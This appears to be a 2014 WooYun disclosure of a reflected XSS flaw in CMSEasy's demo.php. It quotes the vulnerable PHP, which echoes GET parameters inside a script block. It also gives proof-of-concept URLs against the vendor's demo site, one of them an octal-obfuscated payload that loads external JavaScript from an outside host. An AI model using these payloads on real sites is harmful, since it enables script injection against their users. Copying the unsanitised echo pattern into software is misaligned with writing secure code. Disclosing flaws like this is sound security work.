当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069363

漏洞标题:cmseasy反射型XSS无视360webscan&浏览器filter

相关厂商:cmseasy

漏洞作者: phith0n

提交时间:2014-07-23 12:01

修复时间:2014-10-21 12:02

公开时间:2014-10-21 12:02

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-23: 细节已通知厂商并且等待厂商处理中
2014-07-24: 厂商已经确认,细节仅向厂商公开
2014-07-27: 细节向第三方安全合作伙伴开放
2014-09-17: 细节向核心白帽子及相关领域专家公开
2014-09-27: 细节向普通白帽子公开
2014-10-07: 细节向实习白帽子公开
2014-10-21: 细节向公众公开

简要描述:

无视浏览器filter,360webscan~你们俩哪凉快呆哪去~
另外,一直以来读代码的过程中学到了很多,真心希望cmseasy越做越好!

详细说明:

cmseasy默认安装完成以后首页有个demo.php,不知道是干嘛的,里面某处未做过滤,可以xss:
demo.php 91行:

<script type="text/javascript">
var mf=myFocus;//简称
var html=mf.$('myFocus-wrap').innerHTML;//保存原html
function getParam(){//获取全部参数
	return {
		id:'myFocus',
		pattern:'<?php echo $_GET['pattern']; ?>',
		time:<?php echo $_GET['time']; ?>,
		width:<?php echo $_GET['width']; ?>,
		height:<?php echo $_GET['height']; ?>
	};
}


直接将$_GET到的变量输出在<script>标签内,造成了XSS。
因为在script标签内(而且$_GET[time]甚至不用引入单引号),所以绕过各种浏览器filter,而且此demo.php并没有包含360webscan,所以无视之。
详见漏洞证明。

漏洞证明:

官网demo测试:

http://demo.cmseasy.cn/demo.php?time=alert(1)


06.jpg


加载外部js:

http://demo.cmseasy.cn/demo.php?time=document.write("\74\163\143\162\151\160\164\40\163\162\143\75\150\164\164\160\72\57\57\170\163\163\56\143\157\155\57\170\56\152\163\76\74\57\163\143\162\151\160\164\76")

修复方案:

过滤。

版权声明:转载请注明来源 phith0n@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-07-24 08:25

厂商回复:

立即修正

最新状态:

暂无